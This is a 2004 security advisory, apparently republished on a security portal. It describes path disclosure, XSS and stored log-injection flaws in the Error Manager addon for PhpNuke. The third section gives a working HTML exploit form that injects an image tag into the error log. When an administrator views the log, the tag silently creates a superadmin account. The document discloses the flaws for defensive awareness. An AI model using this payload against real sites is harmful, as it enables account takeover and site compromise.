Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
May 25, 2013
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: crisdav
New Today: 1
New Yesterday: 1
Overall: 8637

People Online:
Visitors: 182
Members: 1
Total: 183

Online Now:
01: Sinfuls - Private Messages
milw0rm
·[local exploits] - Ophcrack v3.5.0 - Local Code Execution BOF
·[remote exploits] - MS Internet Explorer & MSN Explorer Arbitrary File Overwrite
·[dos / poc] - win32k!EPATHOBJ::pprFlatt enRec Uninitialized Next Pointer Testcase
·[remote exploits] - Linksys WRT160nv2 apply.cgi Remote Command Injection
·[remote exploits] - D-Link DIR615h OS Command Injection Vulnerability
·[web applications] - iOS < 5.0 Free Apps/Music Bug
·[web applications] - Haraj Script Stored XSS and File Upload Vulnerability
·[web applications] - Dsl Router D-link BZ_1.06 Multiple Vulnerabilities
·[local exploits] - Glibc 2.11.3 / 2.12.x LD_AUDIT libmemusage.so Local Root Exploit
·[web applications] - Moa Gallery 1.2.6 Multiple Vulnerabilities

read more...
PacketStorm News
·CAREL pCOWeb 1.5.0 Default Credential Shell Access
·Microsoft Internet Explorer 10-9 Object Confusion Sandbox Bypass
·Microsoft Internet Explorer 10-9-8-7-6 VML Remote Integer Overflow
·Debian Security Advisory 2672-1
·Debian Security Advisory 2671-1
·Red Hat Security Advisory 2013-0856-01
·Red Hat Security Advisory 2013-0855-01
·Infotecs ViPNet Products Privilege Escalation
·Slackware Security Advisory - kernel Updates
·Red Hat Security Advisory 2013-0847-01

read more...
[waraxe-2004-SA#010] - Multiple vulnerabilities in Error Manager v2.1 for PhpNuke





Author: Janek Vind "waraxe"
Date: 18. March 2004
Location: Estonia, Tartu



Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From developer's readme file:

This Error Manager is made by Gijza.net
The idea came from DR3N.tk
This addon is made for PHP-NUKE 6.0. but may work for other versions
Admin CP is also included in this version.
For the latest version go to www.gijza.net


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. Full path disclosure


Let's look at original code:

//language
if( isset( $newlang ) ) {
include( "language/error/lang-$newlang.php" );
$language = $newlang;
} elseif ( isset( $lang ) ) {
include( "language/error/lang-$lang.php" );
$language = $lang;
} else {
include( "language/error/lang-$language.php" );
}

So - nothing will stop us to request this php file directly and this can lead to
standard php error messages, revealing us the full path to error.php file:

http://localhost/nuke71/error.php?newlang=foobar

Warning: main(language/error/lang-foobar.php): failed to open stream: No such file or directory in D:apache_wwwroot
uke71error.php on line 19



2. Cross-Site Scripting aka XSS


Again, let's look at original code:


if ($error == 401) {
$pagetitle = "- "._EM401."";
}
if ($error == 403) {
$pagetitle = "- "._EM403."";
}
if ($error == 404) {
$pagetitle = "- "._EM404."";
}
if ($error == 500) {
$pagetitle = "- "._EM500."";
}


This is traditionally coded by using the "switch/case" language constructions, but
for some reason the author uses there "if/if/if/..." construction, not even "if/elseif/elseif/else".
And we can see, that if variable $error is not the 401, 403, 404 or 500, but something else, then
we can UNINITIALIZED $pagetitle set to any value. This will lead of course to XSS conditions:

http://localhost/nuke71/error.php?pagetitle=[xss code here]


One more way to XSS exploiting:


http://localhost/nuke71/error.php?error=>[xss code here]


As with all the PhpNuke XSS cases, using of the POST parameters or even better - COOKIE parameters -
will be preffered, because the GET parameters are strictly filtered in mainfile.php .



3. Script injection to error log (nasty one!)


This one is my favourite bug. I mean - Error Manager is suppose to log the error conditions in web server
and therefore admin can find potential bugs on site and of course this logging feature will reveale to
admin many (unsuccessful) attacks by "bad guys". It's shame, but it's true - error logging in Error Manager
will log referer, request URI , etc, but WITHOUT ANY sanityze against html tags ;)
So we can inject any javascript code to error log and when admin will browse the logs, the website can be
compromised - for example cookies can be stealed, additional superadmin accounts can be created without the
knowledge of the admin (refference to [waraxe-2004-SA#008 - easy way to get superadmin rights in PhpNuke 6.x-7.1.0]) etc ...

So, there is an attack scenario:

Write the html file like this one -


<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.victim.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0' src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

</center>
<br><br><br>

</BODY>
</HTML>


Use it aginst victim server and then just wait, till admin reads the error log and then
login to your brand new superadmin account ;)




Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to torufoorum staff and to all IT security related people in Estonia! Tervitused!
Special greets to ulljobu!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2005-01-06 (14690 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2405
vince213333  vince213333 - 736
pexli  pexli - 665
Mullog  Mullog - 539
demon  demon - 481
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 371
tsabitah  tsabitah - 328
y3dips  y3dips - 281
SecurityFocus
·Vuln: X.Org libXcursor '_XcursorFileHeaderCreate ()' Function Remote Code Execution Vulnerability
·Vuln: Oracle Java SE CVE-2013-0401 Remote Code Execution Vulnerability
·Vuln: Python pip CVE-2013-1888 Insecure Temporary File Creation Vulnerability
·Vuln: MIT Kerberos 5 kadmind CVE-2002-2443 Remote Denial of Service Vulnerability
·Bugtraq: CFP: IEEE SafeConfig: 6th Symposium on Security Analytics and Automation
·Bugtraq: SEC Consult SA-20130523-0 :: JavaScript Execution in IBM WebSphere DataPower Services
·Bugtraq: [ANN] Struts 2.3.14.1 GA (fast track | security)
·Bugtraq: APPLE-SA-2013-05-22-1 QuickTime 7.7.4
·More rss feeds from SecurityFocus

read more...
alexa



Nvidia GeForce Reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.042 Seconds